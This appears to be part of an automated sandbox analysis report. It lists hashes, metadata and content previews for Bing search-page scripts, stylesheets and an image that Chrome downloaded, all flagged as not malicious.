                                                                            Category:dropped
                                                                            Size (bytes):289
                                                                            Entropy (8bit):4.88926455834166
                                                                            Encrypted:false
                                                                            SSDEEP:6:2LGXO86zKFddXQOa65Em/L6I38TcqLcUCPrWqpOlZXzPlg3X6:2QO8vzdXmMPTiAiXzC3X6
                                                                            MD5:9085E17B6172D9FC7B7373762C3D6E74
                                                                            SHA1:DAB3CA26EC7A8426F034113AFA2123EDFAA32A76
                                                                            SHA-256:586D8F94486A8116AF00C80A255CBA96C5D994C5864E47DEAC5A7F1AE1E24B0D
                                                                            SHA-512:B27B776CB4947EEF6D9E2A33B46E87796A6D4C427F4759C08CF5AA0EE410A5F12E89CA6AB9CDDD86C8471037E3C505F43C8B7FC6D8417F97F9FE3C5C47216BC4
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(){if("BroadcastChannel"in window){var t=1,n=new BroadcastChannel("tabCountBroadCastChannel");n.onmessage=function(i){i.data=="newTab"&&n.postMessage("existingTab");i.data=="existingTab"&&t++};n.postMessage("newTab");sb_st(function(){Log.Log("Tab","count",t.toString())},200)}})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (646), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):646
                                                                            Entropy (8bit):4.956325886687426
                                                                            Encrypted:false
                                                                            SSDEEP:12:dQyd97msC1oKrZAAtMALQBgsNL6F3FCpU/JrJZhNa:RzpCyoCAtlM7UBRNa
                                                                            MD5:EDC542C94D01808FE099E72D6390361A
                                                                            SHA1:2A1A63CDAA90BC0DC84CD1E5B1036582AAB2078E
                                                                            SHA-256:A47F463D2AF683DE10FD19417124CC0FB77431EBCEF0E7C298E35CABBB4A7A45
                                                                            SHA-512:E6DFC67441D5EB0A9DF9B27B19B98F62B392B5706118ADB1EC56AD1495FE6484774D4465DE0A8AF38B62144AE014791456DA0A117635121F9728407FFC086ECC
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/KhpjzaqQvA3ITNHlsQNlgqqyB44.css
                                                                            Preview:.btns{overflow:hidden;margin-bottom:4px}.splt{float:left}.splt_2btns{width:50%}.splt_3btns{width:33.33%}.splt_nm,.btns .cbtn *,.b_vPanel .btns .cbtn{margin-bottom:0}.btns .cbtn{margin-bottom:8px}.lBtn,.mBtn{margin-right:4px}.rBtn,.mBtn{margin-left:4px}.btns .cbtn a,.btns .cbtn input{width:calc(100% - 32px);margin-bottom:0}.b_1btns .cbtn{width:100%}.b_2btns .cbtn{width:calc(50% - 4px);min-width:calc(50% - 4px)}.b_3btns .cbtn{width:calc(33.33% - 5.333333333px);min-width:calc(33.33% - 5.333333333px)}.btns li.cbtn{display:inline-block}.b_2btns .cbtn:nth-child(even),.b_3btns .cbtn:nth-child(3n+2),.b_3btns .cbtn:nth-child(3n+3){margin-left:8px}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1039), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1039
                                                                            Entropy (8bit):5.394520629964255
                                                                            Encrypted:false
                                                                            SSDEEP:24:AaV1T141S2BjoljiHXdX4daXOcRWOkDqBlg:AK41PjEjiHKKwOjXg
                                                                            MD5:16050BAAF39976A33AC9F854D5EFDB32
                                                                            SHA1:94725020EFA7D3EE8FAED2B7DFFC5A4106363B5E
                                                                            SHA-256:039E6B3DF1D67341FB8E4A3815F0D1BB3292A2040334CEB9CFC4A8D6ABF2FB55
                                                                            SHA-512:CF0D54F0368FFBC6908216FD2573DF8F5FE4C34AC08E17301B8734B3FABC674672A7F456707F632F82F44B36812DAD8A0CF81A51D5CEA21EA7F0E18500298375
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/lHJQIO-n0-6PrtK33_xaQQY2O14.js
                                                                            Preview:var UetTag;(function(n){function t(n,t,i,r,u){var e,o,h,s,v,f,c;i===void 0&&(i="script");r===void 0&&(r="//bat.bing.com/bat.js");u===void 0&&(u="uetq");var y=n.location.search.substring(1),l=y.split("&"),a="";for(e=0;e<l.length;e++)if(o=l[e].split("="),o.length>=2&&o[0]==="form"){a=o[1];break}for(h=["MSC001","MSC002","MSC003","MSC005","MSC006","MSC007","MSC008","MSC009","MSC010","MSC011","MSC012","MSC013","MSC014","MSC015","MSC016","MSC017","MSC018","MSC019","MSC020","SP0001","SP0002","MOG001","MOG002","MOG003","MOG004","MOG005","MOG006","MOG007","MOG008","MOG009","MOG010"],s=0;s<h.length;s++)if(h[s]===a){n[u]=n[u]||[];v=function(){var t={ti:"355015334",q:null};t.q=n[u];n.UET&&(n[u]=new n.UET(t)||[]);n[u].push("pageLoad")};f=t.createElement(i);f.src=r;f.async=1;f.onload=f.onreadystatechange=function(){var n=this.readyState;n&&n!=="loaded"&&n!=="complete"||(v(),f.onload=f.onreadystatechange=null)};c=t.getElementsByTagName(i)[0];c.parentNode.insertBefore(f,c);break}}n.uetTaggingInit=t;t(
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:downloaded
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:V:V
                                                                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:"https://r.bing.com/rs/6r/fU/jnc,nj/tlifxqsNyCzxIJnRwtQKuZToQQw.js?or=w"
                                                                            Preview:0
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):257
                                                                            Entropy (8bit):5.012208451915229
                                                                            Encrypted:false
                                                                            SSDEEP:6:qAdwhhN48IIRnXe7fSAsDDlL72AW5zAH1a2si6gfR+rMZRUZNn:z0/4ZGXeviRfmzS+i6TrgRUTn
                                                                            MD5:F4995A452A1152DBE4CB468DFD0B5331
                                                                            SHA1:1686C393D11997201FCDA1C5C626E3F81839A3CE
                                                                            SHA-256:7EDFDDDF8032CBFF4286CB3AE77E68F478485BD96CBFC0C8A84852415E10A25C
                                                                            SHA-512:CC141089F2E4009B279EB320162000AC705918B7BF548A68062A3B3EA337B502CB5658354F6541E2325B2A1184C8B380C46BA152FD76D9E5DA315FB5DC4BC21D
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/FobDk9EZlyAfzaHFxibj-Bg5o84.js
                                                                            Preview:var sch=sch||{};(function(){var n="click";sj_evt.bind("onP1",function(){setTimeout(function(){var i=_ge("id_h"),t=_ge("id_sc");i&&t&&(sj_jb("Blue/HamburgerServicesHeaderFlyout_c",0,i,"mouseover",t,n,t,"focus"),sj_be(t,n,function(n){sch.clk=n}))},50)},1)})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 200x200, components 3
                                                                            Category:downloaded
                                                                            Size (bytes):9686
                                                                            Entropy (8bit):7.951518008359855
                                                                            Encrypted:false
                                                                            SSDEEP:192:WSRISe65dLuOsp3B8fbiBsSUavophQ/ZJN+RyovV5M20dK+Hpg4:9RISeW1k36zv9g7yyovV5zuFHpg4
                                                                            MD5:032DEBB13E75725E3A9449292C152432
                                                                            SHA1:6D011257AFBE5BB648F6E8D5A4F0419A63EBBE4D
                                                                            SHA-256:52B8C07A84D1F61D38497362A71130898FA80780BCAC879B052C5F29F0420688
                                                                            SHA-512:F0B18DC4E3F45E852BED8F90C91258454DC1AD86D6F162BF1D0CA2E231F79A72051EC7656CB72D55BBE057AA1CBC31115510229F48401055B5380E6087BF1AAF
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://filestore.community.support.microsoft.com/api/profileimages/27f35a84-a786-45d0-a24a-a8db141d1905
                                                                            Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(...(...(.f.....d.zP..3*)g`..I'.W..o..~..i."....../.._..^i...[.....]H..S.A...5.I..6z..7.: *n.........{..j{O..CJK.m....#...W...V...t.8....73M.q.L.....^)s...u^7....[O...%.D@g.&..O.M1....{.....ok........;./%}..=...[.<..)8....cI.q..........(K..3.w.....I..T.7...........ew.....I....%][D......(`..i....F...wS..F1.=GZ...2..N.....g..;[...N.........7._...3.5...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):78
                                                                            Entropy (8bit):4.648879904865525
                                                                            Encrypted:false
                                                                            SSDEEP:3:Hujk6T4KGdluj0MSzO4KSYn:HavHqaTHSYn
                                                                            MD5:0CF1046B1CF52DE4178BB8FE60E9CE80
                                                                            SHA1:18CC3E7A62AD048E2788111DD5061CB7655DC0C0
                                                                            SHA-256:7234EA9E27D099133ECD89D06A42A24C614512D6BD08084EA749109A729FB8C6
                                                                            SHA-512:ABE1D35A51689D11357224A0F3CA7C5B53D7F913AF69F88A8B77EB600DA046A6C3AE280AE4DC214EE00092B95BD72C73036AC303574441D2649944F1A6250A5C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/GMw-emKtBI4niBEd1QYct2VdwMA.css
                                                                            Preview:#b_content a.b_LinksColorMD,#b_content a:visited.b_LinksColorMD{color:#1a73e8}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):272
                                                                            Entropy (8bit):4.797154493193632
                                                                            Encrypted:false
                                                                            SSDEEP:6:fxrYTO8Hx7VYYTO8HxmzN82RqGzxl2MhkN6n:fZgNPU8+qebVY6
                                                                            MD5:E7CFB381BA70426F076ED673EE9F3BC6
                                                                            SHA1:FA438A565066F9B56ADB4FF3159065AB5B9D2E16
                                                                            SHA-256:4F7FFE5DC9E4B13DCFDEF3F3423884EFA26835A4B99A8148DCB615D058D7BF31
                                                                            SHA-512:13FBDBD415B89551BC31D2B3AE4A0B17FA911F196C251B13E063613ACFAD157CF641B9BC8B5445904033C54A961EE03868D13F63E8A7DCC900A0DE6E2DA64F04
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/-kOKVlBm-bVq20_zFZBlq1udLhY.css
                                                                            Preview:#b_results .b_algo{position:relative}#b_results .b_algo .tpic .wr_fav{position:relative}#b_results .tpic .wr_fav .siteicon img{width:16px;height:16px;position:absolute;border-radius:4px;left:5px;top:5px}#b_results .tpic .wr_fav img.siteicon.rms_img{width:16px;height:16px}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (3500), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):3500
                                                                            Entropy (8bit):5.269539776678984
                                                                            Encrypted:false
                                                                            SSDEEP:96:xnUoj12UnBIat6A08aqIcAco+F7mT3p8j+3erfd12AHFyN:BFIc6LfeAco+OqKwFO
                                                                            MD5:7572F94125C2E7621CD216FC13F29095
                                                                            SHA1:23565B05764C248C77BB82C2B837B49C2D6ACD95
                                                                            SHA-256:B52987B0846D6F1D14BB90DA2C7F45ACF76150E905E3DC8706C96F02D79AA12B
                                                                            SHA-512:9232167870195E4132A52D094B11A5C63D3E296147271F6025FF6F1564DCC46F74F3D0F8AD5809C064130E85697BAE81019D706C8E5DF5A95874B87E229D52E7
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var SHgetlochelper;(function(n){function r(r,u,f,e,o,s,h){var c,l;if(navigator&&typeof navigator.geolocation!="undefined"&&typeof navigator.geolocation.getCurrentPosition=="function")if(c=void 0,c=navigator,typeof c.permissions!="undefined"&&typeof c.permissions.query=="function"){l=!1;SHwlochelper.log(t,e,"Perm_Available");try{c.permissions.query({name:"geolocation"}).then(function(c){if(c&&typeof c.state!="undefined"){if(c.state==="denied"){SHwlochelper.log(t,e,"Perm_Denied");SHlochelper.sEM(u,!0);i(e,h,u,f);return}c.state==="prompt"?SHwlochelper.log(t,e,"Perm_Prompt"):c.state==="granted"&&(l=!0,SHwlochelper.log(t,e,"Perm_Granted"))}if(o&&!l)return SHwlochelper.log(t,e,"Perm_NotGranted_NoTryGet"),!1;n.gL(r,u,f,e,s,h)})}catch(a){SHwlochelper.log(t,e,"Error2","Error",a)}}else{if(SHwlochelper.log(t,e,"Perm_Unavailable"),o)return SHwlochelper.log(t,e,"Perm_Unavailable_NoTryGet"),!1;n.gL(r,u,f,e,s,h)}else SHwlochelper.log(t,e,"getCurrentPosition_5");return!1}function i(n,i,r,u){function e
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (924), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):924
                                                                            Entropy (8bit):5.195012633286773
                                                                            Encrypted:false
                                                                            SSDEEP:24:rVnoyfEzPHQFvG99rynERM93YGxSN+/sKE3p5vyNAM:rVnoyCkKgnCM9eBKE55vyj
                                                                            MD5:47442E8D5838BAAA640A856F98E40DC6
                                                                            SHA1:54C60CAD77926723975B92D09FE79D7BEFF58D99
                                                                            SHA-256:15ED1579BCCF1571A7D8B888226E9FE455ACA5628684419D1A18F7CDA68AF89E
                                                                            SHA-512:87C849283248BAF779FAAB7BDE1077A39274DA88BEA3A6F8E1513CB8DCD24A8C465BF431AEE9D655B4E4802E62564D020F0BB1271FB331074D2EC62FC8D08F63
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))};(function(){function n(n){for(var r=[],i=1;i<arguments.length;i++)r[i-1]=arguments[i]}function u(n,t){for(var u=[],r=2;r<arguments.length;r++)u[r-2]=arguments[r];typeof Log!="undefined"&&Log&&Log.Log&&Log.Log.apply(Log,__spreadArray([i,n,t,!1],u,!1))}var t="acclink",i="acclink";if(sj_evt){sj_evt.bind("acclink:updated",function(t){if(t&&t.length>=2){var i=t[1],f=i.IsTenantAllowAccountLink,e=i.HasLinkedAccount;n("fire loadIdLinkIcon with acclink:updated ",t[1]);r(f,e);u("loadIdLinkIcon","load IdLinkIcon","params",t[1])}},1);function r(t,i){var r=_ge("id_linkicon");r&&(t&&i?(r.style.display="inline-block",n("show id link icon")):(r.style.display="none",n("hide id link icon")))}}})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2372), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):2372
                                                                            Entropy (8bit):5.399271608314148
                                                                            Encrypted:false
                                                                            SSDEEP:48:cy5olPjLyYu2BoiD/O7TivxkdxqyGzCtws103e7w74NTIyUAJxUwqaYFCBAKKkeK:Xq5hz9jqxqyGzCCsqO8EJITJI
                                                                            MD5:D09010918ED87EAFE75A6C5B53D0995F
                                                                            SHA1:0425E78B4037F2F6E980B04872EB911CFC529F63
                                                                            SHA-256:41D5F9C642CAF78783C89602AC666ECFF5FA3AFC012EF2C3F1610ED565853D4B
                                                                            SHA-512:5F43334CD3F6830CB29AA2ACA5F59CDD000EAD7EA4C272184B67DB2A4A35B64E66ECA36176268D2FAE726C737E28407622036F2C955A6E95EE9269E8C8E9F5C0
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/BCXni0A38vbpgLBIcuuRHPxSn2M.js
                                                                            Preview:var InsertAdsFramework;(function(n){function y(n){var i=_ge("b_results"),r;i&&a&&(t=i.querySelectorAll(".b_algo"),t.length!=0)&&(h=n,r=ClickBackUtility.isHiddenEventSupported(s),typeof _w!="undefined"&&r&&sj_be(_d,s.visibilityChangedEventName,function(){_d.visibilityState==="visible"&&c("1")}),typeof _w!="undefined"&&ClickBackUtility.isPerformanceNavigationSupported()&&ClickBackUtility.isClickback()&&c("2"),p(),sj_evt.fire("insertads_init"))}function c(n){var f,i,r,e,s;(u("TP",n),f=sessionStorage.getItem(o),f)&&(i=f.split("_"),i.length==3)&&((r=i[1],i[0]!=_G.IG||parseInt(r)>=t.length)||(e=(new Date).getTime(),s=parseInt(i[2]),e-s<v)||(u("Ads","True"),typeof _G=="undefined"||_G.EF===undefined||_G.EF.clickbackadscflog===undefined||_G.EF.clickbackadscflog!==1)&&w(t[r],r))}function p(){for(var i=function(n){var u=t[n],i=u.querySelectorAll(e),r;if(i&&i.length>0)for(r=0;r<i.length;r++)sj_be(i[r],"click",function(){sessionStorage.setItem(o,_G.IG+"_"+n+"_"+(new Date).getTime())})},n=0;n<t.leng
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (546), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):546
                                                                            Entropy (8bit):5.0165945166912636
                                                                            Encrypted:false
                                                                            SSDEEP:12:NY3Ql7RF6VwKKvjFO/47Uxkw7BPxDRRz4j1L7KTfMM:igl7REVwKKy47Uxn7BpRRIl7KTF
                                                                            MD5:C04FF9174AE73DC28DB8A8E4AEC5AEAA
                                                                            SHA1:31A8790654C9012E24574C8D3496743CD355A6E2
                                                                            SHA-256:FD5483AD8CC2E5851B4D4F1826B693B21129352D41AB1A4A15E6D5FE938B95E1
                                                                            SHA-512:281F347FE3EE2699ACECC272DB7AC4E8ED5F0E6580A5A9DFDBA5A2B5221AB43C0889A29ED0F57F9B5CBE24817A6989D52403C90E6E76888DBBA87615ED86CF08
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/Mah5BlTJAS4kV0yNNJZ0PNNVpuI.js
                                                                            Preview:var LogAccessibilityEvents;(function(){function t(){sj_be(_w,"keydown",function(t){n&&t.target==n&&Log.LogFilterFlare&&Log.LogFilterFlare(["screenreader"])})}function i(){var n=matchMedia("(forced-colors: active)"),t=matchMedia("(prefers-color-scheme: dark)");n.matches&&Log.LogFilterFlare&&Log.LogFilterFlare(["highcontrast"]);t.matches&&Log.LogFilterFlare&&Log.LogFilterFlare(["colschemedark"])}var n=document.getElementById("b_skip_to_content");typeof Log!="undefined"&&Log.Log&&(i(),t())})(LogAccessibilityEvents||(LogAccessibilityEvents={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):54
                                                                            Entropy (8bit):4.581108280214317
                                                                            Encrypted:false
                                                                            SSDEEP:3:0+xEe47WSQnS0NCzdY:fxtrS0NCxY
                                                                            MD5:66CA868AF893C63CF58AE76C7AF2B37B
                                                                            SHA1:A365C4E771267E4FAB2DCE17A81A46CF7BB2499E
                                                                            SHA-256:3975F834CF37437F079BF45D137FF1FD3E29136ADDBC08074B7BC6030A210AA7
                                                                            SHA-512:2B42F981BBFD8CD03787DDD483345F799C4558C3551459FD4DAD7A7496675271483DD5E57A535C439428D3FA869583D01C9208B617210481229CAE461BE14EC5
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/o2XE53Emfk-rLc4XqBpGz3uySZ4.css
                                                                            Preview:#b_results .b_algo .b_vlist2col.b_deep ul{width:274px}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (6564), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):6564
                                                                            Entropy (8bit):5.146440994021458
                                                                            Encrypted:false
                                                                            SSDEEP:96:IR7sq0rWdS8Ds+Lbi73+uTEmFd7aae8i3FZ0Af1N+uxOOPJAk+Lb:qDs+vY3TVFNlib0u1N+uxzPilb
                                                                            MD5:262FAC2F6269184B6B4ABF2C296EF196
                                                                            SHA1:B347DA006A20613696DDDEEBA5996A2BE63FAAA9
                                                                            SHA-256:ED39419C076DA40A0726D63A9DE1B76BD8E162DF34074F821001AAFE30DCD9C6
                                                                            SHA-512:E441C5B9A1C960CE244BF6A705CA41080FEC5DBE3EF1A1FB6BCF3A98EB1F89A0716088D52673FDC91AB0BA2DBF380BB8053D5DFA994611606A62F62A4E285CA0
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:"https://r.bing.com/rb/5W/cir3,cc,nc/g95KAhdMHy47l74Gb0hGfkPVFzo.css?bu=DeUu4DCkMqky-zLmOoc9aOwxjS9ogzxo&or=w"
                                                                            Preview:.b_searchboxForm,.sa_as .sa_drw{background-color:#fff}.b_searchboxForm .b_searchboxSubmit{background-color:#fff;border-color:#fff}.b_scopebar,.b_scopebar a,.b_scopebar a:visited,.id_button,.id_button:visited{color:#444}.b_scopebar .b_active a,.b_scopebar a:hover,.id_button:hover{color:#444}.b_idOpen a#id_l,a#id_rh.openfo{color:#333}#bepfo,#id_d{color:#333;background-color:#fff}.wpc_bub a{color:#4007a2}#sw_as{color:#444}.sa_tm strong{color:inherit}.sa_hv{background:#ececec}.sa_hd{color:inherit}#b_header{padding:22px 0 0 0;background-color:#fff}#b_header #sb_form,.b_logoArea,.b_logo,.b_searchboxForm,.id_button,.id_avatar,.idp_ham,.b_scopebar li,.b_scopebar a{display:inline-block}#b_header #sb_form{margin-right:10px}.b_searchbox{width:490px;margin:1px 0 1px 1px;padding:0 10px 0 19px;border:0;max-height:none;outline:none;box-sizing:border-box;height:44px;vertical-align:top;border-radius:6px;background-color:transparent}.b_searchboxSubmit{height:40px;width:40px;text-indent:-99em;border-widt
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (22608), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):22837
                                                                            Entropy (8bit):5.3380357579661375
                                                                            Encrypted:false
                                                                            SSDEEP:384:ye4g/CcCfVTwC0riJs7vv8WlMP9AP1lEnkYGy2K3S9Mw07QRZvlytYA14:ocCcC+C0rbjv8mMPy7vYGy2K3S+w2QRJ
                                                                            MD5:C8AE49581C972FEC0197BB1CA0612760
                                                                            SHA1:9E951428B69DF0BFDD5D476BAC425088CD925ED8
                                                                            SHA-256:6F52AF6168A33EE031281E3FF3F72323FF6A993D960978B8D778641366B09869
                                                                            SHA-512:4782A72A121FC9D573DC13182B786107250D522F4B0ED178F68221D4F73358B57ADCFBE74594CB4B3CF848B88A27BB5E466267A5F9B9DF5032FDACC0BAB5DEC2
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:/*! @license DOMPurify 3.0.0 | (c) Cure53 and other contributors | Released under the Apache license 2.0 and Mozilla Public License 2.0 | github.com/cure53/DOMPurify/blob/3.0.0/LICENSE */..!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).DOMPurify=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,n){return t=Object.setPrototypeOf||function(e,t){return e.__proto__=t,e},t(e,n)}function n(){if("undefined"==typeof Reflect||!Reflect.construct)return!1;if(Reflect.construct.sham)return!1;if("function"==typeof Proxy)return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],(function(){}))),!0}catch(e){return!1}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (891), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):891
                                                                            Entropy (8bit):5.1332488883366585
                                                                            Encrypted:false
                                                                            SSDEEP:24:2QG5MCVFmMCBTotKMCWqEZWMCUHK09nzEIzGln:GbGb+Eb5EgbCr9nz+ln
                                                                            MD5:02B0B245D09DC56BBE4F1A9F1425AC35
                                                                            SHA1:868259C7DC5175A9CC1E2EC835F3D9B4BD3F5673
                                                                            SHA-256:62991181637343332D7B105A605AB69D70D1256092355CFC4359BEE7BDBFB9C6
                                                                            SHA-512:CBB43000A142807FF1BB3BFAC715CEF1240233117C728F357C824CE65B06BE493DF2306C7B03598817F09B02E9E36EC52314F88467679C5BEF3EE1504A10C7E6
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/hoJZx9xRdanMHi7INfPZtL0_VnM.js
                                                                            Preview:(function(){function e(){var t,r;n&&(n.value.length>0?(t=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||t===void 0?void 0:t.add(sj_b,i):(r=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||r===void 0?void 0:r.remove(sj_b,i))}function o(t){var e,o;n.value="";n.innerText="";u&&f&&(u.innerText="",f.classList.remove("nudgeVisible"));(e=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||e===void 0?void 0:e.remove(sj_b,i);sj_log("CI.XButton","Clicked","1");r&&((o=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||o===void 0?void 0:o.add(r,"b_focus"));n.focus();n.click();t&&(t.preventDefault(),t.stopPropagation())}var r=_ge("b_header"),n=_ge("sb_form_q"),t=_ge("sb_clt"),u=_qs(".qfc.b_searchbox .ghost"),f=_qs(".qfc.b_searchbox .nudge"),i="b_sbText";n&&t&&(sj_be(t,"click",o),sj_be(t,"keydown",function(n){var t=n.code||n.key;t==="Enter"&&o(n)}),sj_be(n,"keyup",e),e())})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2683), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):2683
                                                                            Entropy (8bit):5.285209446790883
                                                                            Encrypted:false
                                                                            SSDEEP:48:5sksi0wg1S0h195DlYt/5ZS/wAtKciZIgDa4V8ahff/Z/92zBDZDNJC0x0M:yk1g1zbed3SBkdZ9ZGVFNJCRM
                                                                            MD5:FB797698EF041DD693AEE90FB9C13C7E
                                                                            SHA1:394194F8DD058927314D41E065961B476084F724
                                                                            SHA-256:795E9290718EB62A1FB00646DC738F6A6B715B1171DD54A3D2DEFA013A74F3DA
                                                                            SHA-512:E03C4AB727567BE95B349B971E29CFFB3890CFB1A1DDF997B34B9D69154294A00A5112F4FFCA4DF4E26BBF96AFA75E5943E965EDC8F8E21035ED2EF30B7688D8
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/OUGU-N0FiScxTUHgZZYbR2CE9yQ.js
                                                                            Preview:var IPv6Tests;(function(n){function c(t){var r,c,o,l,f,s,i,a,v;try{if(y(),t==null||t.length==0)return;if(r=sj_cook.get(n.ipv6testcookie,n.ipv6testcrumb),r!=null&&r=="1"&&!u)return;if(c=sj_cook.get(n.ipv6testcookie,n.iptypecrumb),r!=null&&c&&u&&(o=Number(r),l=(new Date).getTime(),!window.isNaN(o)&&o>l))return;if(f=_d.getElementsByTagName("head")[0],!f)return;if(s="ipV6TestScript"+t,i=sj_ce("script",s),i.type="text/javascript",i.async=!0,i.onerror=function(){Log.Log("ipv6test","IPv6Test Dom_ "+t,"IPv6TestError",!1,"Error","JSONP call resulted in error.")},a=_ge(s),a&&f)return;f.insertBefore(i,f.firstChild);i.setAttribute("src",_w.location.protocol+"//"+t+".bing.com/ipv6test/test");e&&p();v=u?(new Date).getTime()+h:"1";sj_cook.set(n.ipv6testcookie,n.ipv6testcrumb,v.toString(),!1)}catch(w){Log.Log("ipv6test","Dom_ "+t,"IPv6TestError",!1,"Error","Failed to make JSONP call. Exception - "+w.message)}}function l(t){if(!t){Log.Log("ipv6test","IPv6TestResponseError","IPv6TestError",!1,"Error","G
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1240), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1240
                                                                            Entropy (8bit):5.223677560423431
                                                                            Encrypted:false
                                                                            SSDEEP:24:LNW5gbRWwaxb3lN7gBSuRW+yaOTe6djrL14uZvhuLufrBChHNVYM:Bqgbwwaxb7gBNwQerLWuZZuLuNChEM
                                                                            MD5:E4BEAB3A36E7AE0CE172D24730A979A4
                                                                            SHA1:AD06A095B6A09C73BF2CA1793222EF13D23C228D
                                                                            SHA-256:1ADEF582C859ED9B4F071CD3196B66AC13503C1346176E78837ABCCB390249A1
                                                                            SHA-512:9A0503536A80348E2467A4A91DF33EABBD1688E93B3D8E68E538A7E39B094A1AEACDE7E23746A7804F180B64F49EC22BFDC24A10104E4A631464891C3133D19F
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/rQaglbagnHO_LKF5MiLvE9I8Io0.js
